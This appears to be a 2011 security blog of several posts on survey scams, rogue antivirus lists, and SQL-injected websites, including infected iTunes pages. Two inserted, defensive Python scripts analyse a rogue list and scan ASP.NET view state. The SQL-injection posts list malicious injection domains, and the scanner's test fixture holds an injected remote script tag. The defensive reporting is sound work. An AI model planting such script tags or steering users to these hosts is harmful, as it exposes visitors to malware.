Download for Japan…or not


There’s a lot of hot downloading action taking place at the moment in relation to the earthquake / tsunami in Japan…most of it related to helping, sharing information, bits of media offered up for free by artists and other things.

And by other things, I mean “random videos that are useless scams”. Nestled in between a collection of “Help Japan” videos / downloads is a “World mask art” download – advertised as “free”, naturally.


[Screenshot]

Do you think this is going to end well, dear reader?


[Screenshot]

Our uploader (called, er, “Porkballer12”) has lobbed 300+ videos onto YouTube in the space of a day or so, and all of them point to the same link – doesn’t matter if it says “World mask art”, “free finance powerpoints” or various kinds of security software. The shortened URL will bounce you from freecracksoftware(dot)com/software to a download site, complete with – you’ve guessed it – a survey.


[Screenshot]

Hitting the frontpage of that website instead of visiting the redirection link will also pop a survey:


[Screenshot]

Call me crazy, but I don’t think you’re going to end up with whatever advertised product brought you to the land of eternal surveys.

Christopher Boyd

Rogue number crunching


Researcher Patrick Jordan put together some statistics on the various Rogues he sees on a daily basis, and I thought it made for some interesting reading.

How are the rogue AV products shaping up in terms of monthly / yearly numbers? Let’s take a look at what Patrick has pulled out of a fiery lake of evil through the years:


[Screenshot]

No surprises that the new finds keep coming, with the foot really hitting the gas pedal in 2008 and never really letting up. In terms of rogues from various families doing the rounds in 2011 (from the 1st of January to the 31st of March), we have a clear winner:

The PrivacyCenter rogue sweeps all aside, and probably accepts some sort of award for services to scamming people out of their money (Patrick tells me that “MSE stands for Microsoft Security Essentials which is the fake alert used with the MSE extension”). While I’m not a huge fan of long lists, the following long list gives you an idea of the overwhelming nature of so many fake products hitting the net every other day:

1/4/2011            Palladium.FakeRean
1/4/2011            HDDFix.FakeSysDef
1/5/2011            MemoryFixer.FakeSysDef
1/9/2011            DiskOK.FakeSysDef
1/12/2011          GoodMemory.FakeSysDef
1/12/2011          FastDisk.FakeSysDef
1/12/2011          WindowsSystemOptimizator
1/15/2011          DiskOptimizer.FakeSysDef
1/17/2011          WindowsOptimization&Security
1/18/2011          MemoryOptimizer.FakeSysDef
1/18/2011          WindowsSecurity&Control
1/20/2011          WindowsUtilityTool
1/21/2011          WindowsScan.FakeSysDef
1/25/2011          WindowsUniversalTool
1/26/2011          Antivirus.Net.FakeSpyPro
1/26/2011          WindowsRiskEliminator
1/27/2011          SmartInternetProtection2011.FakeVimes
1/28/2011          WindowsDisk.FakeSysDef
1/28/2011          AVG-Antivirus.FakeXPA
1/28/2011          WindowsAntispywareSolution
1/28/2011          WindowsShieldCenter
1/31/2011          WindowsHealthCenter
2/1/2011            WindowsProblemsRemover
2/2/2011            WindowsProblemsProtector
2/3/2011            WinDisk.FakeSysDef
2/4/2011            DiskRecovery.FakeSysDef
2/4/2011            InternetSecurity2011.RTK
2/5/2011            WindowsSafetyProtection
2/6/2011            WindowsSoftwareProtection
2/7/2011            PCSecurity2011.FakeSpyPro
2/7/2011            WindowsSoftwareGuard
2/8/2011            WindowsWiseProtection
2/9/2011            AntiViraAV.FakeSpyPro
2/9/2011            WindowsCareTool
2/10/2011          WindowsOptimalSolution
2/11/2011          WindowsOptimalSettings
2/11/2011          AntivirusSystem2011
2/11/2011          InternetSecurityDefender2011
2/14/2011          WindowsProblemsSolution
2/15/2011          WindowsUserSatellite
2/17/2011          WindowsExpressHelp
2/18/2011          WindowsAVSoftware
2/20/2011          WindowsSafetyGuarantee
2/21/2011          InternetSecurityEssentials.FakeVimes
2/21/2011          WindowsOptimalTool
2/22/2011          WindowsExpressSettings
2/22/2011          MegaAntivirus2012
2/23/2011          InternetDefender
2/25/2011          WindowsTool.FakeSysDef
2/25/2011          WindowsPrivacyAgent
2/26/2011          WindowsProcessesOrganizer
2/28/2011          WindowsTroublesAnalyzer
3/1/2011            WindowsPerformanceManager
3/2/2011            AntiMalwareGo.FakeSpyPro
3/2/2011            WindowsEfficiencyManager
3/3/2011            AntiVirusAntiSpyware2011
3/3/2011            XPHomeSecurity.FakeRean
3/3/2011            WindowsDebugSystem
3/5/2011            AntivirusMonitor.FakeSpyPro
3/7/2011            WindowsErrorCorrection
3/8/2011            WindowsDefenceCenter
3/9/2011            WindowsServantSystem
3/10/2011          SystemDefender
3/10/2011          WindowsTroublemakersAgent
3/11/2011          WindowsTroublesRemover
3/13/2011          WindowsDiagnostic.FakeSysDef
3/14/2011          WindowsRemedy
3/16/2011          BestMalwareProtection.FakeVimes
3/16/2011          E-SetAntivirus2011.FakeXPA
3/16/2011          WindowsThreatsRemoving
3/17/2011          WindowsEfficiencyMagnifier
3/18/2011          WindowsSafeMode.FakeSysDef
3/18/2011          SystemDiagnostic.FakeSysDef
3/18/2011          WindowsEmergencySystem
3/21/2011          CleanThis.FakeRean
3/21/2011          WindowsSupportSystem
3/22/2011          WindowsLowlevelSolution
3/23/2011          WindowsRecovery.FakeSysDef
3/23/2011          WindowsBackgroundProtector
3/24/2011          WindowsSimpleProtector
3/25/2011          WindowsPowerExpansion
3/26/2011          MSRemovalTool
3/28/2011          WindowsExpansionSystem
3/29/2011          WindowsRepair.FakeSysDef
3/30/2011          WindowsProcessRegulator
3/31/2011          WindowsStabilityCenter

Pretty crazy. As always, if you happen to find yourself on a website with flashing infection alerts and constant offers to download a “security program”, ignore the prompts, don’t fill in any information and run the other way.
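The monthly and per-family tallies Patrick produces can be derived straight from a list like the one above. The following Python script is an added example, not the post’s own tooling or Patrick’s data set: it parses a constructed excerpt of the list (the “M/D/YYYY  Name[.Family]” layout and the family suffixes such as FakeSysDef are taken from the list itself; the excerpt is a subset, and the family-name convention is assumed to be the last dot-separated component), then counts new rogues per month, per family, and per busiest day. It also skips malformed lines rather than failing on them.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed excerpt of the dated list in the post: one line per new rogue,
# "M/D/YYYY  Name[.Family]". The full list runs to 31 March 2011.
ROGUE_LIST = """\
1/4/2011            Palladium.FakeRean
1/4/2011            HDDFix.FakeSysDef
1/5/2011            MemoryFixer.FakeSysDef
1/12/2011          FastDisk.FakeSysDef
1/12/2011          WindowsSystemOptimizator
1/26/2011          Antivirus.Net.FakeSpyPro
1/28/2011          AVG-Antivirus.FakeXPA
2/3/2011            WinDisk.FakeSysDef
2/4/2011            InternetSecurity2011.RTK
2/7/2011            PCSecurity2011.FakeSpyPro
2/21/2011          InternetSecurityEssentials.FakeVimes
2/22/2011          MegaAntivirus2012
3/3/2011            XPHomeSecurity.FakeRean
3/16/2011          E-SetAntivirus2011.FakeXPA
3/18/2011          SystemDiagnostic.FakeSysDef
3/31/2011          WindowsStabilityCenter
"""

LINE_RE = re.compile(r"^\s*(\d{1,2}/\d{1,2}/\d{4})\s+(\S+)\s*$")
UNCLASSIFIED = "(no family suffix)"


def parse_rogue_list(text):
    """Return (date, product_name, family) for each well-formed line; skip the rest."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # blank or malformed line: ignore rather than abort
        date = datetime.strptime(m.group(1), "%m/%d/%Y").date()
        token = m.group(2)
        # Assumed convention: the family is the last dot-separated component
        # ("Antivirus.Net.FakeSpyPro" is product "Antivirus.Net", family
        # "FakeSpyPro"); names without a dot carry no family label.
        name, dot, family = token.rpartition(".")
        if not dot:
            name, family = token, UNCLASSIFIED
        rows.append((date, name, family))
    return rows


def count_by_month(rows):
    """New rogues per calendar month, keyed YYYY-MM."""
    return Counter(d.strftime("%Y-%m") for d, _, _ in rows)


def count_by_family(rows):
    """New rogues per family suffix."""
    return Counter(f for _, _, f in rows)


def busiest_days(rows, n=3):
    """Dates on which the most new rogues appeared, busiest first."""
    return Counter(d.isoformat() for d, _, _ in rows).most_common(n)


if __name__ == "__main__":
    rows = parse_rogue_list(ROGUE_LIST)
    print(len(rows), "rogues in excerpt")
    print("per month:", dict(sorted(count_by_month(rows).items())))
    print("per family:", count_by_family(rows).most_common())
    print("busiest days:", busiest_days(rows))
```

Paste the full list from the post into ROGUE_LIST and the same functions give the complete first-quarter breakdown; the family counts are what make the FakeSysDef clones stand out as a single campaign rather than dozens of separate products.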

Thanks Patrick.

Christopher Boyd

This looks interesting – Vulnarb


A “market” based approach to getting companies to fix vulnerabilities.

Vulnarb.com is an idea I’ve had for a while but only recently figured out how I might do it. The problem it solves is allowing security researchers to responsibly release vulnerabilities they find, but still publicly report that a company has a vulnerable product.

It’s worth noting that Zed Shaw, the guy who is starting this, is a legendary programmer in the world of open source web frameworks.

Link here.

Alex Eckelberry
(Thanks Matthew)

Apple iTunes page infected

On that whole SQL injection thing, here’s an interesting one I found while stumbling around researching today.


Hmm…What’s that all about? Any more pages like this? Let’s see!

Well, yeah. There’s err, a few.



I found some more, and it doesn’t seem like a huge amount, but it’s something that Apple should certainly clean up.

itunes.apple.com/us/podcast/turkish/id161320202
itunes.apple.com/pl/podcast/cuneyt/id152442304
itunes.apple.com/kr/podcast/belgesel-title-script-src/id206817953

These pages have live malware on them…

(There may be more but it’s Saturday evening and I have a life.)

Alex Eckelberry

More on the “massive” SQL injection attack

Alas, the news was published on April 1st. But it is not a joke.

Curious, I spent a bit of time today researching it (when I really was supposed to be doing other things), and while the “lizamoon” url is down, there are still a number of other URLs active on this one.

Without a lot of effort, I found infections using other URLs, which include

t6ryt56.info/ur.php
tadygus.com/ur.php
milapop.com/ur.ph
books-loader.info/ur.php

(These are all malicious, so obviously don’t go to them unless you know what you’re doing, etc.)

However, I doubt the infection is as massive as is being stated. For unique sites, perhaps a few thousand. More pages than that, but in terms of unique domains, not a million, as might have been inferred from articles.  

What’s curious is that I found something else interesting: encoded View State with malicious URLs injected into the site.

Here’s an example of encoded View State that I found on one of the injected sites.

First, an infected page (with VIPRE yelling away that there’s a problem in the corner — sorry, can’t help the shameless self-promotion).

[Screenshot: infected page]

So let’s take a look at the page source:

[Screenshot: page source showing the encoded View State]

Yuck! What’s all that? It’s encoded View State.

So we go to a handy-dandy decoder, paste the offending text, do a little “where’s Waldo” and there you have it:

[Screenshot: decoded View State with the injected script URL]

How cool is that?

And yes, that is really painfully sloppy stuff.
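The “paste it into a decoder and play where’s Waldo” step can be automated. The script below is an added example, not code from the post: it pulls every `__VIEWSTATE` hidden field out of a page (the standard ASP.NET field name), base64-decodes it, and reports any `<script src=...>` whose host is not the site’s own. It does not parse the serialised view-state format; it relies on the fact that strings inside it are stored as plain length-prefixed UTF-8, so an injected tag is visible in the decoded bytes. The sample page, the `bad.example` host and the `site_host` allow-list parameter are constructed for the example, and the fake view-state stream is a stand-in for the real binary encoding.

```python
import base64
import re
from urllib.parse import urlsplit

# Hidden ASP.NET view-state field as it appears in page source.
VIEWSTATE_RE = re.compile(
    r'<input[^>]*\bid="__VIEWSTATE"[^>]*\bvalue="([^"]*)"', re.IGNORECASE)
# <script src=...>, quoted or not (the injected tags in this attack used no quotes).
SCRIPT_SRC_RE = re.compile(
    rb'<script[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)


def decode_viewstate(b64):
    """Base64-decode a __VIEWSTATE value, tolerating whitespace and lost padding."""
    b64 = "".join(b64.split())
    return base64.b64decode(b64 + "=" * (-len(b64) % 4))


def external_script_srcs(data, site_host):
    """Script src URLs in `data` whose host is not the site's own host.

    Strings inside serialised view state are stored as length-prefixed UTF-8,
    so an injected tag survives the binary framing and can be matched on the
    decoded bytes without parsing the whole format. Relative sources (no host)
    are treated as the site's own.
    """
    found = []
    for m in SCRIPT_SRC_RE.finditer(data):
        src = m.group(1).decode("ascii", "replace")
        host = urlsplit(src).netloc.lower()
        if host and host != site_host.lower():
            found.append(src)
    return found


def scan_page(html, site_host):
    """Report foreign script includes in the markup and inside every __VIEWSTATE."""
    report = {"markup": external_script_srcs(html.encode("utf-8"), site_host),
              "viewstate": []}
    for b64 in VIEWSTATE_RE.findall(html):
        report["viewstate"].extend(
            external_script_srcs(decode_viewstate(b64), site_host))
    return report


# --- constructed sample page; hosts are placeholders, not sites from the post ---
INJECTED = "</title><script src=http://bad.example/ur.php></script>"
_string = ("Featured item" + INJECTED).encode("utf-8")
# Stand-in for the binary serialised stream: a few framing bytes around one
# length-prefixed string (not a faithful ObjectStateFormatter encoding).
_fake_stream = b"\xff\x01\x14\x05" + bytes([len(_string)]) + _string + b"\x0b\x64\x00"
SAMPLE_PAGE = f"""<html><head><title>Shop</title>
<script src="/scripts/site.js"></script></head>
<body><form method="post"><input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="{base64.b64encode(_fake_stream).decode()}" /></form></body></html>"""

if __name__ == "__main__":
    print(scan_page(SAMPLE_PAGE, "shop.example"))
```

Run it over saved copies of a site’s pages with the site’s own hostname as `site_host`; anything reported under `viewstate` is a script include hiding where a quick look at the rendered markup will not show it, which is exactly the case in the screenshot above.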

Alex Eckelberry
(Obligatory hat tip to Jose)

Kleissner’s arrogance is sometimes appealing, more often dismaying

Peter Kleissner has published a rather tasteless April Fools’ joke: a supposed article stating that he has been convicted of selling Ikarus source code. Ikarus is his former employer and the subject of a current squabble.

Kleissner, a brash and very smart 20-year-old Austrian, gained notoriety as a teenager at Black Hat 2009 by releasing Stoned Bootkit, an MBR rootkit he created. That created all kinds of messiness: he was banned from the AV community and fired from his job at Ikarus. Things got uglier when he published a site, avtracker, which tracks the IP addresses antivirus companies use (and so helps malware authors avoid detection). Not good. There’s much more to say about Kleissner, whose antics are sometimes dizzying. I’ll leave that story for someone else.

Alex Eckelberry

Sucker Punched


I think we all know the answer to the question of whether or not I’ll be watching a movie involving a giant robot Samurai waving a chaingun around this weekend, but it’s worth noting that – as with anything movie related – the “fill in the survey / download a program to watch the content” sites are out in force. Step up to the plate, eleventy billion promos for Sucker Punch:


[Screenshot]

Example site:


[Screenshot]


[Screenshot]

As usual, you’re being asked to install something or (elsewhere) fill in a survey:

The Leechtv(dot)com site interested me because, unlike the majority that throw up a fake YouTube player screenshot, this one teases the viewer by playing the first ten or so seconds in a real clip player before “freezing” the clip and launching the popup. I guess that could potentially lure someone into jumping through the required hoops to view the content (if the rest of the content is even there in the first place, that is).

As you might expect, there’s also the usual collection of adf.ly links that generate money for the link creator but send the user to cookie-cutter spamblogs, and “movie sites” that actually just want to sign up to recurring credit card charges for monthly membership.

Don’t waste your time with any of them.

Christopher Boyd